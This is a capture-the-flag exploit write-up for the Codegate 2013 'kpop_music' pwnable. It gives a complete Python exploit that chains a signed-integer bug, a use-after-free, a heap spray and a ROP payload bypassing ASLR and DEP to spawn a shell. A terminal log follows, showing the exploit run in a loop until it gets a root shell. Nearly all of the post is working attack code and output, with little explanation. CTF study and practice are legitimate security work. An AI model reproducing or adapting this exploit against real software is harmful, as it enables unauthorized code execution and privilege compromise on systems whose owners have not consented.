Codegate 2013 Qual - Vulnerab 500 (Exploit only)

Category : Pwnables

kpop_music

Summary : signed integer, use-after-free, heap-spray, ASLR & DEP bypass

Exploit

#!/usr/bin/python import sys from struct import pack show = lambda : sys.stdout.write("1\n") add  = lambda title, url: sys.stdout.write("2\n"+title+"\n"+url+"\n") modify = lambda num, title, url: sys.stdout.write("3\n"+"1\n"+num+"\n"+title+"\n"+url+"\n") delete  = lambda num: sys.stdout.write("4\n"+"1\n"+num+"\n") p = lambda x: pack("<L", x) lift_esp = 0x08049A72  # add esp, 0x1c; pop ebx; pop esi; pop edi; pop ebp; ret ppr = 0x08048FD1 # pop ebx; pop ebp; ret pppr = 0x08049A76 # pop esi; pop edi; pop ebp; ret pop_ecx = 0x08049ac4 # pop ecx; pop ebx; leave; ret custom_stack = 0x8f9f120 sprintf_plt = 0x08048704 # sprintf@plt malloc_got = 0x0804B434 # malloc@got format_string = 0x08049b94 # string "%s" ########## ROP payload for bypass ASLR & DEP ######### stage_0 = "" # stage_0 payload just builds custom-stack for stage_1 payload stage_0 += p(ppr+2)*14  # ret sled #------- COPY byte codes to generate custom stack ----------# stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack-4) stage_0 += p(format_string) stage_0 += p(0x08048da9)        # "\xd0" stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack-3) stage_0 += p(format_string) stage_0 += p(0x08049875)        # "\x8f" stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack-2) stage_0 += p(format_string) stage_0 += p(0x08049a1b)        # "\x00" stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack-1) stage_0 += p(format_string) stage_0 += p(0x08049a2d)        # "\xad" stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack) stage_0 += p(format_string) stage_0 += p(0x080485d9)        # "\x1e" stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack) stage_0 += p(format_string) stage_0 += p(0x080485d9) # "\x1e" stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack+1) stage_0 += p(format_string) stage_0 += p(0x08048a8a) # "\x89" stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack+2) stage_0 += p(format_string) stage_0 += p(0x080483b6)        # "\x04\x08" stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack+8) stage_0 += p(format_string) stage_0 += p(0x08048028)        # "\x34" stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack+9) stage_0 += p(format_string) stage_0 += p(0x080492ba)        # "\x88" stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack+10) stage_0 += p(format_string) stage_0 += p(0x080483b6)        # "\x04\x08" stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack+10) stage_0 += p(format_string) stage_0 += p(0x080483b6)        # "\x04\x08" stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack+16) stage_0 += p(format_string) stage_0 += p(0x08048404)        # "\x76" stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack+17) stage_0 += p(format_string) stage_0 += p(0x08049a1a)        # "\x84" stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack+18) stage_0 += p(format_string) stage_0 += p(0x080483b6)        # "\x04\x08" stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack+20) stage_0 += p(format_string) stage_0 += p(0x08049a1b)        # "\x00" stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack+21) stage_0 += p(format_string) stage_0 += p(0x08049a1b)        # "\x00" stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack+22) stage_0 += p(format_string) stage_0 += p(0x08049a1b)        # "\x00" stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack+23) stage_0 += p(format_string) stage_0 += p(0x08049a1b)        # "\x00" #-----------------------------------------------------------# #-- initialize register & mov stack frame to custom stack --# stage_0 += p(ppr+1) stage_0 += p(custom_stack-4) """ execl@libc - malloc@libc = 0x3e7e0 """ stage_0 += p(pop_ecx) # (set ecx to the offset between execl@libc, malloc@libc) & (move stack frame) stage_0 += p(0x3e7e0) # offset between execl@libc, malloc@libc #-----------------------------------------------------------# #- this stage_1 payload will be generated in custom stack --# """ stage_1 = "" stage_1 += p(0xad008fd0) # malloc@got - 0x5b042464 stage_1 += p(0x0804891e) # add [ebp+0x5b042464] ecx ; pop ebp ;; stage_1 += p(0xdeadbeef) # dummy stage_1 += p(0x08048834) # malloc@plt -> now malloc@got points execl@libc stage_1 += p(0xdeadbeef) # dummy stage_1 += p(0x08048476) # string "sh" stage_1 += p(0) """ #-----------------------------------------------------------# ####################################################### ##################### ALLOCATE ######################## for i in range(0, 3): add("a"*10, "b"*10) ####################################################### ################### HEAP-SPRAY ######################## for i in range(0, 4000): add(p(lift_esp)*(0xbb4/4), p(lift_esp)*(0xbb4/4)) ####################################################### ############# PUT ROP PAYLOAD IN STACK ################ add("title", stage_0+"1") ####################################################### ################## TRIGGER VULN ####################### delete("-1073741820") modify("3", "A"*0x50, "\x20\x31\x31\x09"*3) show() #######################################################

root@ubuntu:~/vuln/500# while [ 1 ] ; do (./exploit.py;cat) | ./kpop_music ; done ====================================================================     __ __ ____  ____  ____     __  _____  _______ __________    / //_// __ \/ __ \/ __ \   /  |/  / / / / ___//  _/ ____/   / ,<  / /_/ / / / / /_/ /  / /|_/ / / / /\__ \ / // /       / /| |/ ____/ /_/ / ____/  / /  / / /_/ /___/ // // /___    /_/ |_/_/    \____/_/      /_/  /_/\____//____/___/\____/                Welcome to the KPOP Music WORLD! ==================================================================== ------------------------ 1. Show kpop song list 2. Add a new kpop song 3. Modify kpop song 4. Delete kpop song 5. Search kpop song 6. Quit ------------------------ MENU> kpop_song title : Youtube URL : [*] successfully added a new song ....................................................................... ....................................................................... 2. Gone not around any longer(SISTAR19)  - http://www.youtube.com/watch?v=JtVhwsACgTw 3. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  -   id uid=0(root) gid=0(root) 그룹들=0(root)